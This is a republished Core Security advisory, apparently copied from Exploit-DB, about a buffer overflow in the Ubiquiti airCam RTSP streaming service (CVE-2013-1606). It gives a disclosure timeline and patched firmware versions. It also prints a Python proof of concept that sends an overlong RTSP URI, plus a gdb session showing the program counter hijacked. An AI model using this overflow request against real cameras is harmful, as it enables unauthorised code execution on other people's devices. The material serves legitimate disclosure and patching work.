Ubiquiti airCam RTSP Service 1.1.5 – Buffer Overflow (PoC)

• Exploit Database
• 13 阅读

• 作者： Core Security
  日期： 2013-06-12
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/26138/

• Core Security - Corelabs Advisory
  http://corelabs.coresecurity.com
  
  Buffer overflow in Ubiquiti airCam RTSP service
  
  
  1. *Advisory Information*
  
  Title: Buffer overflow in Ubiquiti airCam RTSP service
  Advisory ID: CORE-2013-0430
  Advisory URL:
  http://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service
  Date published: 2013-06-11
  Date of last update: 2013-06-11
  Vendors contacted: Ubiquiti
  Release mode: Coordinated release
  
  
  2. *Vulnerability Information*
  
  Class: Classic buffer overflow [CWE-120]
  Impact: Code execution
  Remotely Exploitable: Yes
  Locally Exploitable: No
  CVE Name: CVE-2013-1606
  
  
  3. *Vulnerability Description*
  
  The Ubiquiti [1] airCam RTSP service 'ubnt-streamer', has a buffer
  overflow when parsing the URI of a RTSP request message. This bug allows
  remote attackers to execute arbitrary code via RTSP request message.
  
  
  4. *Vulnerable Packages*
  
   . Cameras Models: airCam, airCam Mini, airCam Dome.
   . Firmware Version Verified: AirCam v1.1.5.
   . Other devices are probably affected too, but they were not checked.
  
  
  5. *Non-Vulnerable Packages*
  
   . firmware v1.2.0 (airVision 2.x platform).
   . firmware v1.1.6 (airVision 1.x platform).
  
  6. *Vendor Information, Solutions and Workarounds*
  
  Patched firmware versions can be downloaded from the Ubiquiti official
  website [2], [3].
  
  
  7. *Credits*
  
  These vulnerabilities were discovered and researched by Andres Blanco
  from Core Exploit Writers Team. The publication of this advisory was
  coordinated by Fernando Miranda from Core Advisories Team.
  
  
  8. *Technical Description / Proof of Concept Code*
  
  
  /-----
  #
  # Author: Andres Blanco - CORE Security Technologies.
  #
  # The contents of this software are copyright (c) 2013 CORE Security and
  (c) 2013 CoreLabs,
  # and are licensed under a Creative Commons Attribution Non-Commercial
  Share-Alike 3.0 (United States)
  # License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
  #
  # THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
  # WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
  # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
  # CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
  # THIS SOFTWARE.
  #
  
  import socket
  
  class RtspRequest(object):
  
  def __init__(self, ip_address, port):
  self._ip_address = ip_address
  self._port = port
  
  def generate_request(self, method, uri, headers):
  data = ""
  data += "%s %s RTSP/1.0\r\n" % (method, uri)
  for item in headers:
  header = headers[item]
  data += "%s: %s\r\n" % (item, header)
  data += "\r\n"
  return data
  
  def send_request(self, data):
  sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sd.settimeout(15)
  sd.connect((self._ip_address, self._port))
  sd.send(data)
  resp = sd.recv(2048)
  sd.close()
  return resp
  
  if __name__ == "__main__":
  ip = "192.168.100.1"
  anRtsp = RtspRequest(ip, 554)
  data = ""
  data += "A" * 271
  data += "\x78\x56\x34\x12"
  uri = "rtsp://%s/%s/live/ch00_0" % (ip, data)
  headers = { "CSeq" : "1" }
  req = anRtsp.generate_request("DESCRIBE", uri, headers)
  rsp = anRtsp.send_request(req)
  -----/
  
  Below the gdb session when executing the PoC.
  
  /-----
  AirCam.v1.1.5# ./gdb --pid 358
  ...
  Attaching to process 358
  
  warning: process 358 is a cloned process
  Reading symbols from /bin/ubnt-streamer...(no debugging symbols
  found)...done.
  Reading symbols from /lib/libpthread.so.0...(no debugging symbols
  found)...done.
  ...
  0x401c60a0 in select () from /lib/libc.so.6
  (gdb) c
  Continuing.
  
  Program received signal SIGSEGV, Segmentation fault.
  0x12345678 in ?? ()
  (gdb) info registers
  r0 0x00
  r1 0x11
  r2 0xffffffff 4294967295
  r3 0x11
  r4 0x41414141 1094795585
  r5 0x41414141 1094795585
  r6 0x41414141 1094795585
  r7 0xd7198881048
  r8 0x00
  r9 0x00
  r100xc6119811289
  r110xc625f811615
  r120x23 35
  sp 0x40a7eaf0 0x40a7eaf0
  lr 0x48d34298292
  pc 0x12345678 0x12345678
  cpsr 0x20000010 536870928
  (gdb) info stack
  #00x12345678 in ?? ()
  #10x00048d34 in ?? ()
  #20x00048d34 in ?? ()
  Backtrace stopped: previous frame identical to this frame (corrupt stack?)
  (gdb) x/50xw $sp-0x80
  0x40a7ea70: 0x414141410x414141410x414141410x41414141
  0x40a7ea80: 0x414141410x414141410x414141410x41414141
  0x40a7ea90: 0x414141410x414141410x414141410x41414141
  0x40a7eaa0: 0x414141410x414141410x414141410x41414141
  0x40a7eab0: 0x414141410x414141410x414141410x41414141
  0x40a7eac0: 0x414141410x414141410x414141410x41414141
  0x40a7ead0: 0x414141410x414141410x414141410x41414141
  0x40a7eae0: 0x414141410x414141410x414141410x12345678
  0x40a7eaf0: 0x76696c2f0x68632f650x305f30300x000d7100
  0x40a7eb00: 0x000c60600x000c61190x000593400x000491a8
  0x40a7eb10: 0x000d73f60x000c62670x000000010x000c6060
  0x40a7eb20: 0x000c61190x000593400x000c61180x00049780
  0x40a7eb30: 0x000000000x000c611c
  -----/
  
  
  9. *Report Timeline*
  
  . 2013-05-02:
  Core Security Technologies notifies the Ubiquiti team of the
  vulnerability. Publication date is set for May 29th, 2013.
  
  . 2013-05-02:
  Vendor acknowledges the receipt of the email and asks for technical
  details.
  
  . 2013-05-02:
  A draft report with technical details and a PoC sent to Ubiquiti team.
  
  . 2013-05-03:
  Vendor notifies that a new firmware version should address this
  vulnerability. It will be released shortly to the alpha and beta community.
  
  . 2013-05-06:
  Core notifies that the advisory will be re-scheduled to be released when
  patches are available to the alpha and beta community and asks for a
  tentative release date.
  
  . 2013-05-09:
  Core asks for a status update regarding this vulnerability and a
  tentative release date.
  
  . 2013-05-13:
  Vendor notifies the firmware is still in internal testing and the
  release date will be confirmed in the following days.
  
  . 2013-05-27:
  Core notifies that there was no answer in the last 2 weeks regarding the
  release date. Core also notifies that the advisory was re-scheduled for
  Jun 4th, and asks for a clear timeline to justify keep delaying the
  release.
  
  . 2013-05-28:
  Vendor notifies that the new firmware is almost done and a confirmed
  date will be notified in the following days.
  
  . 2013-05-29:
  Core asks if a beta firmware is available for downloading.
  
  . 2013-05-29:
  Vendor notifies that they have a v1.1.6 build of the firmware which is
  being tested internally and will be released very soon, probably this
  week. However, it is not yet available on the ubnt.com/download site.
  
  . 2013-05-29:
  First release date missed.
  
  . 2013-06-03:
  Core asks for a status update.
  
  . 2013-06-03:
  Vendor notifies that they do not have a specific release date yet.
  
  . 2013-06-11:
  Vendor notifies that they released firmware 1.2.0 along with airVision 2
  [2][3], and a public announcement will be made soon. Release of firmware
  1.1.6 (for the airVision 1.x platform) has to be defined.
  
  . 2013-06-11:
  Advisory CORE-2013-0430 published.
  
  
  10. *References*
  
  [1] http://www.ubnt.com.
  [2] Ubiquiti downloads http://www.ubnt.com/download#AirCam.
  [3] Ubiquiti firmware v1.2.0
  http://www.ubnt.com/downloads/AirCam-v1.2.0.build17961.bin.
  
  
  11. *About CoreLabs*
  
  CoreLabs, the research center of Core Security Technologies, is charged
  with anticipating the future needs and requirements for information
  security technologies. We conduct our research in several important
  areas of computer security including system vulnerabilities, cyber
  attack planning and simulation, source code auditing, and cryptography.
  Our results include problem formalization, identification of
  vulnerabilities, novel solutions and prototypes for new technologies.
  CoreLabs regularly publishes security advisories, technical papers,
  project information and shared software tools for public use at:
  http://corelabs.coresecurity.com.
  
  
  12. *About Core Security Technologies*
  
  Core Security Technologies enables organizations to get ahead of threats
  with security test and measurement solutions that continuously identify
  and demonstrate real-world exposures to their most critical assets. Our
  customers can gain real visibility into their security standing, real
  validation of their security controls, and real metrics to more
  effectively secure their organizations.
  
  Core Security's software solutions build on over a decade of trusted
  research and leading-edge threat expertise from the company's Security
  Consulting Services, CoreLabs and Engineering groups. Core Security
  Technologies can be reached at +1 (617) 399-6980 or on the Web at:
  http://www.coresecurity.com.
  
  
  13. *Disclaimer*
  
  The contents of this advisory are copyright (c) 2013 Core Security
  Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
  Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
  License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
  
  
  14. *PGP/GPG Keys*
  
  This advisory has been signed with the GPG key of Core Security
  Technologies advisories team, which is available for download at
  http://www.coresecurity.com/files/attachments/core_security_advisories.asc.